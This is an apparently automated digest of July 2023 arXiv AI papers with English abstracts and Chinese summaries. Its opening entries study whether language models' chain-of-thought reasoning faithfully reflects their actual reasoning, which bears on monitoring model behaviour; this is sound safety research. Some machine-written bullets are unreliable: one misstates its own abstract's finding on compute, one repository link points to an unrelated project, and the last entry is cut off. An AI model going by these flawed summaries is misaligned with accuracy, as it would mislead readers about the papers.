  • paper_authors: Tamera Lanham, Anna Chen, Ansh Radhakrishnan, Benoit Steiner, Carson Denison, Danny Hernandez, Dustin Li, Esin Durmus, Evan Hubinger, Jackson Kernion, Kamilė Lukošiūtė, Karina Nguyen, Newton Cheng, Nicholas Joseph, Nicholas Schiefer, Oliver Rausch, Robin Larson, Sam McCandlish, Sandipan Kundu, Saurav Kadavath, Shannon Yang, Thomas Henighan, Timothy Maxwell, Timothy Telleen-Lawton, Tristan Hume, Zac Hatfield-Dodds, Jared Kaplan, Jan Brauner, Samuel R. Bowman, Ethan Perez
  • for: 这个论文的目的是研究语言模型(LLMs)是否在回答问题时能够提供 faithful(忠实)的解释。
  • methods: 这个论文使用 intervening 方法来检查 LLMS 是否真正地使用 chain-of-thought(CoT)reasoning 来回答问题。
  • results: 研究发现,LLMS 在不同任务上 exhibit 大量的差异,有时会强烈依赖 CoT,有时却忽略它。CoT 的性能提升不仅来自于 CoT 的额外计算,还有来自于模型的其他因素。在大型模型和更强大的能力下,LLMS 的 faithful reasoning 减退。总之,我们的结果表明,CoT 可以是 faithful 的,只要选择合适的任务和模型。
    Abstract Large language models (LLMs) perform better when they produce step-by-step, "Chain-of-Thought" (CoT) reasoning before answering a question, but it is unclear if the stated reasoning is a faithful explanation of the model's actual reasoning (i.e., its process for answering the question). We investigate hypotheses for how CoT reasoning may be unfaithful, by examining how the model predictions change when we intervene on the CoT (e.g., by adding mistakes or paraphrasing it). Models show large variation across tasks in how strongly they condition on the CoT when predicting their answer, sometimes relying heavily on the CoT and other times primarily ignoring it. CoT's performance boost does not seem to come from CoT's added test-time compute alone or from information encoded via the particular phrasing of the CoT. As models become larger and more capable, they produce less faithful reasoning on most tasks we study. Overall, our results suggest that CoT can be faithful if the circumstances such as the model size and task are carefully chosen.
    摘要 大型语言模型(LLM)在回答问题前先生成逐步的"思维链"(CoT)推理时往往表现更好,但并不清楚这些陈述出的推理是否忠实地反映了模型的实际推理过程(即其回答问题的真实过程)。我们通过对CoT进行干预(例如向其中添加错误或对其改写)并观察模型预测的变化,来检验CoT推理可能不忠实的假设。我们发现,模型在不同任务上对CoT的依赖程度差异很大,有时严重依赖CoT,有时则基本忽略它。CoT带来的性能提升似乎既不单纯来自CoT额外的测试时计算,也不来自CoT特定措辞所编码的信息。随着模型变得更大、能力更强,它们在我们研究的大多数任务上给出的推理反而更不忠实。总体而言,我们的结果表明,只要谨慎选择模型规模和任务等条件,CoT是可以做到忠实的。

Question Decomposition Improves the Faithfulness of Model-Generated Reasoning

  • paper_url: http://arxiv.org/abs/2307.11768
  • repo_url: https://github.com/anthropics/decompositionfaithfulnesspaper
  • paper_authors: Ansh Radhakrishnan, Karina Nguyen, Anna Chen, Carol Chen, Carson Denison, Danny Hernandez, Esin Durmus, Evan Hubinger, Jackson Kernion, Kamilė Lukošiūtė, Newton Cheng, Nicholas Joseph, Nicholas Schiefer, Oliver Rausch, Sam McCandlish, Sheer El Showk, Tamera Lanham, Tim Maxwell, Venkatesa Chandrasekaran, Zac Hatfield-Dodds, Jared Kaplan, Jan Brauner, Samuel R. Bowman, Ethan Perez
  • for: 帮助验证大型自然语言模型(LLM)的正确性和安全性。
  • methods: 使用Chain-of-Thought(CoT)来询问模型,并让模型生成步骤 reasoning 来回答问题。
  • results: 通过划分问题为子问题来提高模型生成的 reasoning 的准确性,并在一些最近提出的指标上达到了类似于 CoT 的性能,同时改善了模型生成的 reasoning 的准确性。
    Abstract As large language models (LLMs) perform more difficult tasks, it becomes harder to verify the correctness and safety of their behavior. One approach to help with this issue is to prompt LLMs to externalize their reasoning, e.g., by having them generate step-by-step reasoning as they answer a question (Chain-of-Thought; CoT). The reasoning may enable us to check the process that models use to perform tasks. However, this approach relies on the stated reasoning faithfully reflecting the model's actual reasoning, which is not always the case. To improve over the faithfulness of CoT reasoning, we have models generate reasoning by decomposing questions into subquestions. Decomposition-based methods achieve strong performance on question-answering tasks, sometimes approaching that of CoT while improving the faithfulness of the model's stated reasoning on several recently-proposed metrics. By forcing the model to answer simpler subquestions in separate contexts, we greatly increase the faithfulness of model-generated reasoning over CoT, while still achieving some of the performance gains of CoT. Our results show it is possible to improve the faithfulness of model-generated reasoning; continued improvements may lead to reasoning that enables us to verify the correctness and safety of LLM behavior.
    摘要 随着大语言模型(LLM)承担越来越困难的任务,验证其行为的正确性和安全性也变得更加困难。一种应对方法是提示模型将推理过程外化,例如在回答问题时生成逐步推理(Chain-of-Thought,CoT),从而使我们能够检查模型完成任务的过程。然而,这种方法依赖于模型陈述的推理忠实地反映其实际推理,而这一点并不总是成立。为提高CoT推理的忠实性,我们让模型通过将问题分解为子问题来生成推理。基于分解的方法在问答任务上表现出色,有时接近CoT的性能,同时在若干最新提出的指标上提高了模型陈述推理的忠实性。通过迫使模型在独立的上下文中回答更简单的子问题,我们大幅提高了模型生成推理相对于CoT的忠实性,同时仍保留了CoT的一部分性能收益。我们的结果表明提升模型生成推理的忠实性是可行的;持续的改进或许能让推理最终帮助我们验证LLM行为的正确性和安全性。

In-IDE Generation-based Information Support with a Large Language Model

  • paper_url: http://arxiv.org/abs/2307.08177
  • repo_url: https://github.com/chrisneagu/FTC-Skystone-Dark-Angels-Romania-2020
  • paper_authors: Daye Nam, Andrew Macvean, Vincent Hellendoorn, Bogdan Vasilescu, Brad Myers
  • for: 这个论文的目的是研究一种基于大语言模型(LLM)的代码理解UI,以帮助开发者更好地理解代码。
  • methods: 该论文使用OpenAI的GPT-3.5和GPT-4模型,在IDE中直接构建了一个对话式UI,让开发者无需显式撰写提示语即可通过高层请求让模型解释选中的代码、提供代码中API调用的细节、解释领域特有术语,以及给出API使用示例。
  • results: 该论文的用户研究显示,使用该系统可以帮助开发者更快速地完成任务,并且在开发者中间的学生和专业人员之间存在显著的使用和感受差异。研究结果表明,在IDE中基于LLM的启用对话UI是未来工具建造的有前途的方向。
    Abstract Understanding code is challenging, especially when working in new and complex development environments. Code comments and documentation can help, but are typically scarce or hard to navigate. Large language models (LLMs) are revolutionizing the process of writing code. Can they do the same for helping understand it? In this study, we provide a first investigation of an LLM-based conversational UI built directly in the IDE that is geared towards code understanding. Our IDE plugin queries OpenAI's GPT-3.5 and GPT-4 models with four high-level requests without the user having to write explicit prompts: to explain a highlighted section of code, provide details of API calls used in the code, explain key domain-specific terms, and provide usage examples for an API. The plugin also allows for open-ended prompts, which are automatically contextualized to the LLM with the program being edited. We evaluate this system in a user study with 32 participants, which confirms that using our plugin can aid task completion more than web search. We additionally provide a thorough analysis of the ways developers use, and perceive the usefulness of, our system, among others finding that the usage and benefits differ significantly between students and professionals. We conclude that in-IDE prompt-less interaction with LLMs is a promising future direction for tool builders.
    摘要 理解代码并非易事,尤其是在陌生而复杂的开发环境中。代码注释和文档可以提供帮助,但通常稀缺或难以查阅。大语言模型(LLM)正在变革代码编写的过程,它们能否同样帮助人们理解代码?在这项研究中,我们首次考察了一个直接内置于IDE、面向代码理解的基于LLM的对话式UI。我们的IDE插件可向OpenAI的GPT-3.5和GPT-4模型发出四类高层请求,而无需用户显式撰写提示语:解释选中的代码片段、提供代码中API调用的细节、解释关键的领域特有术语,以及给出API的使用示例。插件还支持开放式提问,这些提问会结合当前正在编辑的程序自动补充上下文后提交给LLM。我们在一项有32名参与者的用户研究中评估了该系统,结果证实使用我们的插件比网页搜索更有助于完成任务。我们还深入分析了开发者使用该系统的方式及其对系统有用性的感受,发现学生与专业人员在使用方式和获益上存在显著差异。我们的结论是:在IDE中无需撰写提示的LLM交互,是工具开发者值得关注的未来方向。

Credit Assignment: Challenges and Opportunities in Developing Human-like AI Agents

  • paper_url: http://arxiv.org/abs/2307.08171
  • repo_url: None
  • paper_authors: Thuy Ngoc Nguyen, Chase McDonald, Cleotilde Gonzalez
  • for: 这种研究旨在探讨人类如何处理延迟反馈,以及计算机方法如TD方法在人工智能中是否准确反映人类行为。
  • methods: 该研究使用了一种基于经验决策理论的认知模型,Instance-Based Learning Theory (IBLT),测试不同的信任分配机制在目标寻找 Navigation 任务中的表现。
  • results: 研究发现,(1) 一个给所有决策平等信任分配的 IBLT 模型能够更好地匹配人类表现,比其他模型更高效;(2) IBL-TD 和 Q-学习模型在开始时 initially 下遇到困难,但 eventually 超越人类表现;(3) 人类决策 Complexity 会影响决策,而模型则不会。
    Abstract Temporal credit assignment is crucial for learning and skill development in natural and artificial intelligence. While computational methods like the TD approach in reinforcement learning have been proposed, it's unclear if they accurately represent how humans handle feedback delays. Cognitive models intend to represent the mental steps by which humans solve problems and perform a number of tasks, but limited research in cognitive science has addressed the credit assignment problem in humans and cognitive models. Our research uses a cognitive model based on a theory of decisions from experience, Instance-Based Learning Theory (IBLT), to test different credit assignment mechanisms in a goal-seeking navigation task with varying levels of decision complexity. Instance-Based Learning (IBL) models simulate the process of making sequential choices with different credit assignment mechanisms, including a new IBL-TD model that combines the IBL decision mechanism with the TD approach. We found that (1) An IBL model that gives equal credit assignment to all decisions is able to match human performance better than other models, including IBL-TD and Q-learning; (2) IBL-TD and Q-learning models underperform compared to humans initially, but eventually, they outperform humans; (3) humans are influenced by decision complexity, while models are not. Our study provides insights into the challenges of capturing human behavior and the potential opportunities to use these models in future AI systems to support human activities.
    摘要 时间归属是学习和技能发展中非常重要的因素,而计算方法如TD方法在强化学习中已经被提出,但是不清楚这些方法是否准确地表现出人类对延迟反馈的处理方式。认知模型旨在表现人类解决问题和完成任务的心理步骤,但是认知科学中对归属问题的研究很少。我们的研究使用基于经验决策理论的认知模型(Instance-Based Learning Theory,IBLT)测试不同的归属机制在具有不同决策复杂度的目标寻找 Navigation 任务中的表现。Instance-Based Learning(IBL)模型模拟了在发送连续选择时使用不同归属机制的过程,其中包括一种新的IBL-TD模型,该模型结合IBL决策机制和TD方法。我们发现:1. 给所有决策平等的归属机制的IBL模型能够更好地与人类表现相符,比其他模型,包括IBL-TD和Q学习模型。2. IBL-TD和Q学习模型在初期比人类表现更差,但是在后期它们超越了人类表现。3. 人类受到决策复杂度的影响,而模型则不是。我们的研究提供了人类行为的挑战和未来AI系统中使用这些模型的可能性。
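    A minimal sketch of the IBL-style mechanism with the equal credit assignment that matched human behavior best in this study: every decision in an episode stores the episode's final outcome, and options are valued by blending stored outcomes with a recency-based weight. The decay value is a placeholder, and the noise and mismatch terms of full IBLT are omitted for brevity.

```python
from collections import defaultdict

DECAY = 0.5                        # IBLT-style decay parameter d (placeholder value)
memory = defaultdict(list)         # (state, action) -> list of (timestep_stored, outcome)

def blended_value(state, action, t_now):
    """Blend stored outcomes, weighting instances by a simple recency term (t - t_i)^-d."""
    instances = memory[(state, action)]
    if not instances:
        return 0.0                                     # default utility for unseen options
    weights = [(t_now - t_i) ** -DECAY for t_i, _ in instances]
    total = sum(weights)
    return sum(w / total * outcome for w, (_, outcome) in zip(weights, instances))

def equal_credit_update(episode, final_outcome, t_now):
    """Equal credit assignment: every decision in the episode stores the final outcome."""
    for state, action in episode:
        memory[(state, action)].append((t_now, final_outcome))

# One toy episode of a goal-seeking task: three decisions, a delayed reward of +1 at the end.
episode = [("s0", "right"), ("s1", "up"), ("s2", "up")]
equal_credit_update(episode, final_outcome=1.0, t_now=1)
print(blended_value("s0", "right", t_now=5))   # the earliest decision gets full credit too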

Computing the gradients with respect to all parameters of a quantum neural network using a single circuit

  • paper_url: http://arxiv.org/abs/2307.08167
  • repo_url: https://github.com/gphehub/grad2210
  • paper_authors: Guang Ping He
  • for: 使用参数移位(parameter-shift)规则计算量子神经网络的梯度时,每个可调参数的梯度都需要对代价函数求值两次;当参数总数很多时,量子电路必须被反复调整并多次运行。我们提出一种只用单个电路即可计算全部梯度的方法,同时显著降低电路深度并减少经典寄存器数量。
  • methods: 所提方法仅使用单个电路计算所有梯度,电路深度更小,所需经典寄存器更少。
  • results: 在真实量子硬件和模拟器上的实验表明,该方法的电路编译时间明显短于传统方法,从而缩短了总运行时间。
    Abstract When computing the gradients of a quantum neural network using the parameter-shift rule, the cost function needs to be calculated twice for the gradient with respect to a single adjustable parameter of the network. When the total number of parameters is high, the quantum circuit for the computation has to be adjusted and run for many times. Here we propose an approach to compute all the gradients using a single circuit only, with a much reduced circuit depth and less classical registers. We also demonstrate experimentally, on both real quantum hardware and simulator, that our approach has the advantages that the circuit takes a significantly shorter time to compile than the conventional approach, resulting in a speedup on the total runtime.
    摘要 使用参数移位规则计算量子神经网络的梯度时,针对网络中的每一个可调参数,都需要对代价函数求值两次;当参数总数很多时,计算所用的量子电路必须被反复调整并多次运行。我们提出一种仅用单个电路即可计算全部梯度的方法,其电路深度大幅降低,所需经典寄存器也更少。我们还在真实量子硬件和模拟器上的实验中表明,与传统方法相比,该方法的电路编译时间显著缩短,从而加快了总体运行时间。
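
For context, the conventional parameter-shift rule that the paper improves on costs two cost-function evaluations per trainable parameter. The sketch below is a classical toy stand-in (the `expectation` function is not a real quantum circuit); it only illustrates where the 2 × (number of parameters) evaluation count comes from.

```python
# Illustrative sketch of the conventional parameter-shift rule; the toy
# "circuit" below is a classical stand-in for a parameterized quantum circuit.
import numpy as np

def expectation(params):
    # Stand-in for running a parameterized circuit and measuring an observable;
    # a real implementation would execute on quantum hardware or a simulator.
    return np.sum(np.sin(params))

def parameter_shift_gradient(params, shift=np.pi / 2):
    grads = np.zeros_like(params)
    for i in range(len(params)):            # 2 * len(params) circuit evaluations
        plus, minus = params.copy(), params.copy()
        plus[i] += shift
        minus[i] -= shift
        grads[i] = 0.5 * (expectation(plus) - expectation(minus))
    return grads

theta = np.array([0.1, 0.5, 1.2])
print(parameter_shift_gradient(theta))      # ~cos(theta) for this toy model
```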

Assessing the Quality of Multiple-Choice Questions Using GPT-4 and Rule-Based Methods

  • paper_url: http://arxiv.org/abs/2307.08161
  • repo_url: https://github.com/stevenjamesmoore/ectel23
  • paper_authors: Steven Moore, Huy A. Nguyen, Tianying Chen, John Stamper
  • for: This paper aims to assess the quality of multiple-choice questions and identify common item-writing flaws present in student-generated questions.
  • methods: The paper compares the performance of a rule-based method and a machine-learning based method (GPT-4) in automatically assessing multiple-choice questions for item-writing flaws.
  • results: The rule-based method correctly detected 91% of the flaws identified by human annotators, outperforming GPT-4 which detected 79% of the flaws. The study demonstrates the effectiveness of the two methods in identifying common item-writing flaws present in student-generated questions across different subject areas.
    Abstract Multiple-choice questions with item-writing flaws can negatively impact student learning and skew analytics. These flaws are often present in student-generated questions, making it difficult to assess their quality and suitability for classroom usage. Existing methods for evaluating multiple-choice questions often focus on machine readability metrics, without considering their intended use within course materials and their pedagogical implications. In this study, we compared the performance of a rule-based method we developed to a machine-learning based method utilizing GPT-4 for the task of automatically assessing multiple-choice questions based on 19 common item-writing flaws. By analyzing 200 student-generated questions from four different subject areas, we found that the rule-based method correctly detected 91% of the flaws identified by human annotators, as compared to 79% by GPT-4. We demonstrated the effectiveness of the two methods in identifying common item-writing flaws present in the student-generated questions across different subject areas. The rule-based method can accurately and efficiently evaluate multiple-choice questions from multiple domains, outperforming GPT-4 and going beyond existing metrics that do not account for the educational use of such questions. Finally, we discuss the potential for using these automated methods to improve the quality of questions based on the identified flaws.
    摘要 存在命题编写缺陷的多项选择题会对学生的学习产生负面影响,并使教学分析数据失真。这类缺陷常出现在学生自编的题目中,使其质量与课堂适用性难以评估。现有的多项选择题评估方法通常只关注机器可读性指标,而不考虑题目在课程材料中的用途及其教学意义。在本研究中,我们比较了自行开发的基于规则的方法与使用 GPT-4 的机器学习方法在依据 19 种常见命题编写缺陷自动评估多项选择题这一任务上的表现。通过分析来自四个不同学科的 200 道学生自编题目,我们发现基于规则的方法能正确检出人工标注者所识别缺陷中的 91%,而 GPT-4 为 79%。我们证明了这两种方法都能识别不同学科学生自编题目中的常见命题编写缺陷;其中基于规则的方法能够准确且高效地评估多个领域的多项选择题,表现优于 GPT-4,并超越了未考虑题目教学用途的现有指标。最后,我们讨论了利用这些自动方法、根据检出的缺陷来提升题目质量的可能性。
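
As an illustration of what a rule-based flaw detector can look like, here is a hypothetical sketch covering three classic item-writing flaws; the rules, thresholds, and example question are assumptions for demonstration, not the paper's 19-flaw rule set.

```python
def check_flaws(stem, options, answer_index):
    """Flag a few classic item-writing flaws in one multiple-choice question."""
    flaws = []
    lowered = [o.strip().lower() for o in options]
    if any(o in ("all of the above", "none of the above") for o in lowered):
        flaws.append("uses an 'all/none of the above' option")
    if " not " in f" {stem.lower()} ":
        flaws.append("negatively worded stem")
    others = [len(o) for i, o in enumerate(options) if i != answer_index]
    if len(options[answer_index]) > 1.5 * (sum(others) / len(others)):
        flaws.append("correct option is conspicuously longer than the distractors")
    return flaws

print(check_flaws(
    stem="Which of the following is not a mammal?",
    options=["Dolphin", "Bat", "A shark, which is a cartilaginous fish", "None of the above"],
    answer_index=2,
))
```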

POA: Passable Obstacles Aware Path-planning Algorithm for Navigation of a Two-wheeled Robot in Highly Cluttered Environments

  • paper_url: http://arxiv.org/abs/2307.08141
  • repo_url: None
  • paper_authors: Alexander Petrovsky, Yomna Youssef, Kirill Myasoedov, Artem Timoshenko, Vladimir Guneavoi, Ivan Kalinov, Dzmitry Tsetserukou
  • for: 这个论文是为了提出一种新的导航方法,使两轮机器人在受限的环境中能够穿越障碍物。
  • methods: 这个算法可以探测和分类障碍物,并将障碍物分为两类:可通过和不可通过。该算法允许两轮机器人找到通过障碍物的路径。
  • results: 与标准导航算法相比,这个方法可以降低路径长度和总旅行时间,最多降低43%和39%。
    Abstract This paper focuses on Passable Obstacles Aware (POA) planner - a novel navigation method for two-wheeled robots in a highly cluttered environment. The navigation algorithm detects and classifies objects to distinguish two types of obstacles - passable and unpassable. Our algorithm allows two-wheeled robots to find a path through passable obstacles. Such a solution helps the robot working in areas inaccessible to standard path planners and find optimal trajectories in scenarios with a high number of objects in the robot's vicinity. The POA planner can be embedded into other planning algorithms and enables them to build a path through obstacles. Our method decreases path length and the total travel time to the final destination up to 43% and 39%, respectively, comparing to standard path planners such as GVD, A*, and RRT*
    摘要 本文提出面向可通过障碍物的 POA(Passable Obstacles Aware)规划器——一种用于高度杂乱环境中两轮机器人的新型导航方法。该导航算法能够检测并分类物体,将障碍物区分为可通过与不可通过两类,使两轮机器人能够找到穿过可通过障碍物的路径。这一方案帮助机器人在标准路径规划器无法到达的区域工作,并在机器人周围物体众多的场景中找到最优轨迹。POA 规划器可嵌入其他规划算法,使其能够规划穿过障碍物的路径。与 GVD、A* 和 RRT* 等标准路径规划器相比,该方法可将路径长度和到达终点的总时间分别最多缩短 43% 和 39%。

Heterogeneous graphs model spatial relationships between biological entities for breast cancer diagnosis

  • paper_url: http://arxiv.org/abs/2307.08132
  • repo_url: None
  • paper_authors: Akhila Krishna K, Ravi Kant Gupta, Nikhil Cherian Kurian, Pranav Jeevan, Amit Sethi
  • for: 这篇论文旨在通过图神经网络(GNN)建模组织病理图像中生物实体之间的空间关系,以提升乳腺癌早期检测、预后评估与治疗选择的准确性。
  • methods: 论文使用一种异质 GNN 模型,捕捉细胞图与组织图之间的空间和层次关系,并比较了基于交叉注意力的网络与 Transformer 架构在建模这些复杂关系上的表现。
  • results: 该模型在三个公开的乳腺癌数据集(BRIGHT、BreakHis 和 BACH)上取得了优于基于 Transformer 的最新方法的准确率,且参数量更少。
    Abstract The heterogeneity of breast cancer presents considerable challenges for its early detection, prognosis, and treatment selection. Convolutional neural networks often neglect the spatial relationships within histopathological images, which can limit their accuracy. Graph neural networks (GNNs) offer a promising solution by coding the spatial relationships within images. Prior studies have investigated the modeling of histopathological images as cell and tissue graphs, but they have not fully tapped into the potential of extracting interrelationships between these biological entities. In this paper, we present a novel approach using a heterogeneous GNN that captures the spatial and hierarchical relations between cell and tissue graphs to enhance the extraction of useful information from histopathological images. We also compare the performance of a cross-attention-based network and a transformer architecture for modeling the intricate relationships within tissue and cell graphs. Our model demonstrates superior efficiency in terms of parameter count and achieves higher accuracy compared to the transformer-based state-of-the-art approach on three publicly available breast cancer datasets -- BRIGHT, BreakHis, and BACH.
    摘要 乳腺癌的异质性给其早期检测、预后评估和治疗选择带来了相当大的挑战。卷积神经网络往往忽略组织病理图像内部的空间关系,从而限制其准确性。图神经网络(GNN)通过编码图像中的空间关系提供了一个有前景的解决方案。先前的研究已经尝试将组织病理图像建模为细胞图和组织图,但尚未充分挖掘这些生物实体之间相互关系的潜力。本文提出一种新的异质 GNN 方法,捕捉细胞图与组织图之间的空间和层次关系,以增强从组织病理图像中提取有用信息的能力。我们还比较了基于交叉注意力的网络与 Transformer 架构在建模组织图和细胞图内部复杂关系上的表现。在三个公开的乳腺癌数据集(BRIGHT、BreakHis 和 BACH)上,我们的模型在参数量更少的情况下取得了高于基于 Transformer 的最新方法的准确率。

INFLECT-DGNN: Influencer Prediction with Dynamic Graph Neural Networks

  • paper_url: http://arxiv.org/abs/2307.08131
  • repo_url: https://github.com/banking-analytics-lab/inflect
  • paper_authors: Elena Tiukhova, Emiliano Penaloza, María Óskarsdóttir, Bart Baesens, Monique Snoeck, Cristián Bravo
  • For: 本研究面向 referral 和 targeted marketing 中的 influencer 检测,利用动态网络表示来提高预测性能。
  • Methods: 本研究提出一种名为 INFLECT-DGNN 的新框架,它将图神经网络(GNN)与循环神经网络(RNN)结合,并采用加权损失函数、针对图数据改造的 SMOTE 过采样技术,以及精心设计的滚动窗口策略。
  • Results: 用 RNN 编码时间特征并与 GNN 结合,可显著提高预测性能;对不同模型的比较表明,捕捉图表示、时间依赖性以及采用利润驱动的评估方法都非常重要。
    Abstract Leveraging network information for predictive modeling has become widespread in many domains. Within the realm of referral and targeted marketing, influencer detection stands out as an area that could greatly benefit from the incorporation of dynamic network representation due to the ongoing development of customer-brand relationships. To elaborate this idea, we introduce INFLECT-DGNN, a new framework for INFLuencer prEdiCTion with Dynamic Graph Neural Networks that combines Graph Neural Networks (GNN) and Recurrent Neural Networks (RNN) with weighted loss functions, the Synthetic Minority Oversampling TEchnique (SMOTE) adapted for graph data, and a carefully crafted rolling-window strategy. To evaluate predictive performance, we utilize a unique corporate data set with networks of three cities and derive a profit-driven evaluation methodology for influencer prediction. Our results show how using RNN to encode temporal attributes alongside GNNs significantly improves predictive performance. We compare the results of various models to demonstrate the importance of capturing graph representation, temporal dependencies, and using a profit-driven methodology for evaluation.
    摘要 利用网络信息进行预测建模已在许多领域得到广泛应用。在推荐与定向营销领域,由于客户与品牌关系不断演化,影响者(influencer)检测尤其能从动态网络表示中获益。为阐述这一想法,我们提出 INFLECT-DGNN——一个基于动态图神经网络的影响者预测新框架,它将图神经网络(GNN)与循环神经网络(RNN)相结合,并使用加权损失函数、针对图数据改造的少数类过采样技术(SMOTE)以及精心设计的滚动窗口策略。为评估预测性能,我们使用一个包含三座城市网络的独特企业数据集,并推导出一种面向利润的影响者预测评估方法。结果表明,用 RNN 编码时间属性并与 GNN 结合能显著提升预测性能。我们比较了多种模型的结果,以说明捕捉图表示、时间依赖性以及采用利润驱动评估方法的重要性。
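
The released code is linked above; purely as an interpretation of the "GNN + RNN over rolling windows" idea, the sketch below averages each node's neighbourhood per time window and runs a GRU over the resulting sequence to score nodes. Dimensions, the aggregation rule, and the data are placeholder assumptions, not the INFLECT-DGNN architecture.

```python
# Hedged sketch: per-window node embeddings from simple neighbourhood mixing,
# fed as a time series into a GRU that scores each node as a future influencer.
import torch
import torch.nn as nn

class WindowGNNThenGRU(nn.Module):
    def __init__(self, in_dim, hid_dim):
        super().__init__()
        self.lin = nn.Linear(in_dim, hid_dim)
        self.gru = nn.GRU(hid_dim, hid_dim, batch_first=True)
        self.head = nn.Linear(hid_dim, 1)

    def forward(self, adj_seq, feat_seq):
        # adj_seq: (T, N, N) adjacency per window; feat_seq: (T, N, in_dim) features.
        per_window = [torch.relu(self.lin(a @ x)) for a, x in zip(adj_seq, feat_seq)]
        seq = torch.stack(per_window, dim=1)          # (N, T, hid_dim)
        out, _ = self.gru(seq)
        return torch.sigmoid(self.head(out[:, -1]))   # influencer probability per node

T, N, D = 4, 10, 8
model = WindowGNNThenGRU(D, 16)
adj = torch.rand(T, N, N)       # random stand-ins for demonstration only
feats = torch.rand(T, N, D)
print(model(adj, feats).shape)  # torch.Size([10, 1])
```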

A max-affine spline approximation of neural networks using the Legendre transform of a convex-concave representation

  • paper_url: http://arxiv.org/abs/2307.09602
  • repo_url: https://github.com/adamgoodtime/legendre_net
  • paper_authors: Adam Perrett, Danny Wood, Gavin Brown
  • for: 本研究提出了一种将神经网络转换为样条(spline)表示的新算法。与以往需要网络算子为凸且分段仿射才能构造 max-affine 样条替代形式的工作不同,该算法放宽了这一约束,只要求函数有界且具有良定义的二阶导数(实验还表明该条件并非严格必需)。
  • methods: 本研究使用了一种新的算法,可以在整个神经网络中进行spline转换,而不是只在每层级独立进行转换。这种算法还可以覆盖整个神经网络,而不是只是在某些层级进行。
  • results: 实验表明,这种算法可以准确地将神经网络转换成spline表示形式,并且可以在不同的神经网络架构中进行应用。此外,这种算法还可以提取神经网络特征图,从而帮助更好地理解神经网络的工作机理。
    Abstract This work presents a novel algorithm for transforming a neural network into a spline representation. Unlike previous work that required convex and piecewise-affine network operators to create a max-affine spline alternate form, this work relaxes this constraint. The only constraint is that the function be bounded and possess a well-define second derivative, although this was shown experimentally to not be strictly necessary. It can also be performed over the whole network rather than on each layer independently. As in previous work, this bridges the gap between neural networks and approximation theory but also enables the visualisation of network feature maps. Mathematical proof and experimental investigation of the technique is performed with approximation error and feature maps being extracted from a range of architectures, including convolutional neural networks.
    摘要 本文提出一种将神经网络转换为样条表示的新算法。与以往需要凸且分段仿射的网络算子才能构造 max-affine 样条替代形式的工作不同,本文放宽了这一约束:唯一的要求是函数有界且具有良定义的二阶导数,而实验表明即便该条件也并非严格必需。该转换还可以在整个网络上进行,而不必逐层独立处理。与先前工作一样,这项工作弥合了神经网络与逼近理论之间的差距,同时使得网络特征图的可视化成为可能。我们对该技术给出了数学证明与实验研究,并在包括卷积神经网络在内的多种架构上提取了逼近误差与特征图。
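
For intuition about the max-affine spline form the paper targets, here is a toy numpy sketch (not the paper's algorithm, which handles general bounded functions via a convex-concave split and the Legendre transform): tangent planes of a convex function, taken at a few sample points, already yield a max-affine approximation s(x) = max_k(a_k x + b_k).

```python
# Toy illustration of a max-affine spline built from tangent planes of a convex
# function; the target function and knot placement are illustrative choices.
import numpy as np

f = lambda x: x ** 2           # convex target
df = lambda x: 2 * x           # its derivative

knots = np.linspace(-2.0, 2.0, 5)
a = df(knots)                  # slopes  a_k
b = f(knots) - a * knots       # offsets b_k

def max_affine(x):
    return np.max(a[:, None] * x[None, :] + b[:, None], axis=0)

xs = np.linspace(-2, 2, 9)
print(np.round(f(xs) - max_affine(xs), 3))   # small, non-negative gap at each point
```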

A Comprehensive Survey of Forgetting in Deep Learning Beyond Continual Learning

  • paper_url: http://arxiv.org/abs/2307.09218
  • repo_url: https://github.com/ennengyang/awesome-forgetting-in-deep-learning
  • paper_authors: Zhenyi Wang, Enneng Yang, Li Shen, Heng Huang
  • for: This paper aims to provide a comprehensive survey of forgetting in deep learning, exploring its various manifestations and challenges, and highlighting its potential advantages in certain cases.
  • methods: The paper draws upon ideas and approaches from various fields that have dealt with forgetting, including continual learning, generative models, and federated learning.
  • results: The paper presents a nuanced understanding of forgetting and highlights its potential advantages in certain scenarios, such as privacy-preserving scenarios. It also provides a comprehensive list of papers about forgetting in various research fields for future reference.
    Abstract Forgetting refers to the loss or deterioration of previously acquired information or knowledge. While the existing surveys on forgetting have primarily focused on continual learning, forgetting is a prevalent phenomenon observed in various other research domains within deep learning. Forgetting manifests in research fields such as generative models due to generator shifts, and federated learning due to heterogeneous data distributions across clients. Addressing forgetting encompasses several challenges, including balancing the retention of old task knowledge with fast learning of new tasks, managing task interference with conflicting goals, and preventing privacy leakage, etc. Moreover, most existing surveys on continual learning implicitly assume that forgetting is always harmful. In contrast, our survey argues that forgetting is a double-edged sword and can be beneficial and desirable in certain cases, such as privacy-preserving scenarios. By exploring forgetting in a broader context, we aim to present a more nuanced understanding of this phenomenon and highlight its potential advantages. Through this comprehensive survey, we aspire to uncover potential solutions by drawing upon ideas and approaches from various fields that have dealt with forgetting. By examining forgetting beyond its conventional boundaries, in future work, we hope to encourage the development of novel strategies for mitigating, harnessing, or even embracing forgetting in real applications. A comprehensive list of papers about forgetting in various research fields is available at \url{https://github.com/EnnengYang/Awesome-Forgetting-in-Deep-Learning}.
    摘要 忘却(forgetting)指先前获得的信息或知识的丢失或退化。现有关于忘却的综述主要集中在持续学习上,但忘却是深度学习多个研究领域中普遍存在的现象:例如生成模型中由生成器漂移引起的忘却,以及联邦学习中由客户端间数据分布异质性引起的忘却。应对忘却涉及多项挑战,包括在保留旧任务知识与快速学习新任务之间取得平衡、处理目标相互冲突的任务干扰,以及防止隐私泄露等。此外,大多数现有的持续学习综述都隐含地假设忘却总是有害的。与此相反,本综述认为忘却是一把双刃剑,在某些情况下(例如隐私保护场景)可能是有益且值得追求的。通过在更广阔的背景中考察忘却,我们希望呈现对这一现象更细致的理解,并突出其潜在优势。借助这份全面综述,我们期望汲取各个处理过忘却问题的领域中的思路与方法,发掘潜在的解决方案,并在未来工作中推动针对实际应用中缓解、利用甚至拥抱忘却的新策略的发展。关于各研究领域中忘却问题的完整论文列表见 \url{https://github.com/EnnengYang/Awesome-Forgetting-in-Deep-Learning}。

cs.CL - 2023-07-17

Syntax-Aware Complex-Valued Neural Machine Translation

  • paper_url: http://arxiv.org/abs/2307.08586
  • repo_url: None
  • paper_authors: Yang Liu, Yuexian Hou
  • for: 提高 neural machine translation (NMT) 的翻译性能
  • methods: 使用复杂值 Encoder-Decoder 架构,并将 syntax 信息直接 интегрирован到 NMT 模型中,使用注意机制来学习 word-level 和 syntax-level 注意力分数
